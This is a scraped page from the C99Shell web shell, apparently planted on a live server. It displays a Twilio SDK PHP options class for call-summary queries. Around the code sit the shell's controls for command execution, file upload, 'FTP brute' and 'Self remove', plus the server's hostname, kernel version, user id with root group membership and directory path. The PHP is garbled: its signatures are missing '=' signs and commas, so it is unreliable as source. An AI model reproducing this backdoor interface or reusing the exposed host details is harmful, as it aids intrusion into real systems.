!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/Rest/Insights/V1/   drwxrwxr-x
Free 28.57 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CallSummariesOptions.php (9.51 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Insights\V1;

use 
Twilio\Options;
use 
Twilio\Values;

abstract class 
CallSummariesOptions {
    
/**
     * @param string $from The from
     * @param string $to The to
     * @param string $fromCarrier The from_carrier
     * @param string $toCarrier The to_carrier
     * @param string $fromCountryCode The from_country_code
     * @param string $toCountryCode The to_country_code
     * @param bool $branded The branded
     * @param bool $verifiedCaller The verified_caller
     * @param bool $hasTag The has_tag
     * @param string $startTime The start_time
     * @param string $endTime The end_time
     * @param string $callType The call_type
     * @param string $callState The call_state
     * @param string $direction The direction
     * @param string $processingState The processing_state
     * @param string $sortBy The sort_by
     * @param string $subaccount The subaccount
     * @param bool $abnormalSession The abnormal_session
     * @return ReadCallSummariesOptions Options builder
     */
    
public static function read(string $from Values::NONEstring $to Values::NONEstring $fromCarrier Values::NONEstring $toCarrier Values::NONEstring $fromCountryCode Values::NONEstring $toCountryCode Values::NONEbool $branded Values::NONEbool $verifiedCaller Values::NONEbool $hasTag Values::NONEstring $startTime Values::NONEstring $endTime Values::NONEstring $callType Values::NONEstring $callState Values::NONEstring $direction Values::NONEstring $processingState Values::NONEstring $sortBy Values::NONEstring $subaccount Values::NONEbool $abnormalSession Values::NONE): ReadCallSummariesOptions {
        return new 
ReadCallSummariesOptions($from$to$fromCarrier$toCarrier$fromCountryCode$toCountryCode$branded$verifiedCaller$hasTag$startTime$endTime$callType$callState$direction$processingState$sortBy$subaccount$abnormalSession);
    }
}

class 
ReadCallSummariesOptions extends Options {
    
/**
     * @param string $from The from
     * @param string $to The to
     * @param string $fromCarrier The from_carrier
     * @param string $toCarrier The to_carrier
     * @param string $fromCountryCode The from_country_code
     * @param string $toCountryCode The to_country_code
     * @param bool $branded The branded
     * @param bool $verifiedCaller The verified_caller
     * @param bool $hasTag The has_tag
     * @param string $startTime The start_time
     * @param string $endTime The end_time
     * @param string $callType The call_type
     * @param string $callState The call_state
     * @param string $direction The direction
     * @param string $processingState The processing_state
     * @param string $sortBy The sort_by
     * @param string $subaccount The subaccount
     * @param bool $abnormalSession The abnormal_session
     */
    
public function __construct(string $from Values::NONEstring $to Values::NONEstring $fromCarrier Values::NONEstring $toCarrier Values::NONEstring $fromCountryCode Values::NONEstring $toCountryCode Values::NONEbool $branded Values::NONEbool $verifiedCaller Values::NONEbool $hasTag Values::NONEstring $startTime Values::NONEstring $endTime Values::NONEstring $callType Values::NONEstring $callState Values::NONEstring $direction Values::NONEstring $processingState Values::NONEstring $sortBy Values::NONEstring $subaccount Values::NONEbool $abnormalSession Values::NONE) {
        
$this->options['from'] = $from;
        
$this->options['to'] = $to;
        
$this->options['fromCarrier'] = $fromCarrier;
        
$this->options['toCarrier'] = $toCarrier;
        
$this->options['fromCountryCode'] = $fromCountryCode;
        
$this->options['toCountryCode'] = $toCountryCode;
        
$this->options['branded'] = $branded;
        
$this->options['verifiedCaller'] = $verifiedCaller;
        
$this->options['hasTag'] = $hasTag;
        
$this->options['startTime'] = $startTime;
        
$this->options['endTime'] = $endTime;
        
$this->options['callType'] = $callType;
        
$this->options['callState'] = $callState;
        
$this->options['direction'] = $direction;
        
$this->options['processingState'] = $processingState;
        
$this->options['sortBy'] = $sortBy;
        
$this->options['subaccount'] = $subaccount;
        
$this->options['abnormalSession'] = $abnormalSession;
    }

    
/**
     * The from
     *
     * @param string $from The from
     * @return $this Fluent Builder
     */
    
public function setFrom(string $from): self {
        
$this->options['from'] = $from;
        return 
$this;
    }

    
/**
     * The to
     *
     * @param string $to The to
     * @return $this Fluent Builder
     */
    
public function setTo(string $to): self {
        
$this->options['to'] = $to;
        return 
$this;
    }

    
/**
     * The from_carrier
     *
     * @param string $fromCarrier The from_carrier
     * @return $this Fluent Builder
     */
    
public function setFromCarrier(string $fromCarrier): self {
        
$this->options['fromCarrier'] = $fromCarrier;
        return 
$this;
    }

    
/**
     * The to_carrier
     *
     * @param string $toCarrier The to_carrier
     * @return $this Fluent Builder
     */
    
public function setToCarrier(string $toCarrier): self {
        
$this->options['toCarrier'] = $toCarrier;
        return 
$this;
    }

    
/**
     * The from_country_code
     *
     * @param string $fromCountryCode The from_country_code
     * @return $this Fluent Builder
     */
    
public function setFromCountryCode(string $fromCountryCode): self {
        
$this->options['fromCountryCode'] = $fromCountryCode;
        return 
$this;
    }

    
/**
     * The to_country_code
     *
     * @param string $toCountryCode The to_country_code
     * @return $this Fluent Builder
     */
    
public function setToCountryCode(string $toCountryCode): self {
        
$this->options['toCountryCode'] = $toCountryCode;
        return 
$this;
    }

    
/**
     * The branded
     *
     * @param bool $branded The branded
     * @return $this Fluent Builder
     */
    
public function setBranded(bool $branded): self {
        
$this->options['branded'] = $branded;
        return 
$this;
    }

    
/**
     * The verified_caller
     *
     * @param bool $verifiedCaller The verified_caller
     * @return $this Fluent Builder
     */
    
public function setVerifiedCaller(bool $verifiedCaller): self {
        
$this->options['verifiedCaller'] = $verifiedCaller;
        return 
$this;
    }

    
/**
     * The has_tag
     *
     * @param bool $hasTag The has_tag
     * @return $this Fluent Builder
     */
    
public function setHasTag(bool $hasTag): self {
        
$this->options['hasTag'] = $hasTag;
        return 
$this;
    }

    
/**
     * The start_time
     *
     * @param string $startTime The start_time
     * @return $this Fluent Builder
     */
    
public function setStartTime(string $startTime): self {
        
$this->options['startTime'] = $startTime;
        return 
$this;
    }

    
/**
     * The end_time
     *
     * @param string $endTime The end_time
     * @return $this Fluent Builder
     */
    
public function setEndTime(string $endTime): self {
        
$this->options['endTime'] = $endTime;
        return 
$this;
    }

    
/**
     * The call_type
     *
     * @param string $callType The call_type
     * @return $this Fluent Builder
     */
    
public function setCallType(string $callType): self {
        
$this->options['callType'] = $callType;
        return 
$this;
    }

    
/**
     * The call_state
     *
     * @param string $callState The call_state
     * @return $this Fluent Builder
     */
    
public function setCallState(string $callState): self {
        
$this->options['callState'] = $callState;
        return 
$this;
    }

    
/**
     * The direction
     *
     * @param string $direction The direction
     * @return $this Fluent Builder
     */
    
public function setDirection(string $direction): self {
        
$this->options['direction'] = $direction;
        return 
$this;
    }

    
/**
     * The processing_state
     *
     * @param string $processingState The processing_state
     * @return $this Fluent Builder
     */
    
public function setProcessingState(string $processingState): self {
        
$this->options['processingState'] = $processingState;
        return 
$this;
    }

    
/**
     * The sort_by
     *
     * @param string $sortBy The sort_by
     * @return $this Fluent Builder
     */
    
public function setSortBy(string $sortBy): self {
        
$this->options['sortBy'] = $sortBy;
        return 
$this;
    }

    
/**
     * The subaccount
     *
     * @param string $subaccount The subaccount
     * @return $this Fluent Builder
     */
    
public function setSubaccount(string $subaccount): self {
        
$this->options['subaccount'] = $subaccount;
        return 
$this;
    }

    
/**
     * The abnormal_session
     *
     * @param bool $abnormalSession The abnormal_session
     * @return $this Fluent Builder
     */
    
public function setAbnormalSession(bool $abnormalSession): self {
        
$this->options['abnormalSession'] = $abnormalSession;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Insights.V1.ReadCallSummariesOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0067 ]--